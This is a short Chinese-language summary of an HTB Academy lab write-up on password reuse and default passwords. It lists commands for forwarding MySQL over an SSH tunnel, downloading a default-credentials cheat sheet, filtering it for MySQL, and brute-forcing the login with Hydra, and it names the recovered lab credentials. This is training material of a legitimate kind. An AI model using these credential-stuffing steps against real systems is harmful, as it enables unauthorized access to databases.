HTB学院:密码攻击模块——密码重用/默认密码

💡 原文英文,约300词,阅读约需1分钟。
📝

内容提要

任务是使用先前发现的用户凭据找到MySQL凭据。通过建立SSH隧道将MySQL端口转发到本地机器,然后下载默认凭据备忘单并筛选出MySQL凭据。最后使用Hydra暴力破解登录成功找到有效的MySQL凭据。

Q&A

如何使用SSH隧道转发MySQL端口?

使用命令ssh -L 4444:localhost:3306 sam@10.129.xx.xxx建立SSH隧道,将MySQL端口转发到本地机器。

下载默认凭据备忘单的命令是什么?

使用命令wget https://raw.githubusercontent.com/ihebski/DefaultCreds-cheat-sheet/main/DefaultCreds-Cheat-Sheet.csv下载默认凭据备忘单。

如何从备忘单中筛选MySQL凭据?

使用命令cat DefaultCreds-Cheat-Sheet.csv | grep -i 'mysql'将MySQL特定的凭据筛选出来并保存到cred.list文件中。

如何使用Hydra进行暴力破解登录?

使用命令hydra -C cred.list mysql://localhost:4444来自动尝试凭据进行暴力破解登录。

成功找到的MySQL凭据是什么?

成功找到的MySQL凭据是用户名superdba,密码admin。

在这个任务中,使用了哪些工具?

在这个任务中使用了SSH、wget、grep和Hydra等工具。

🏷️

标签

➡️

继续阅读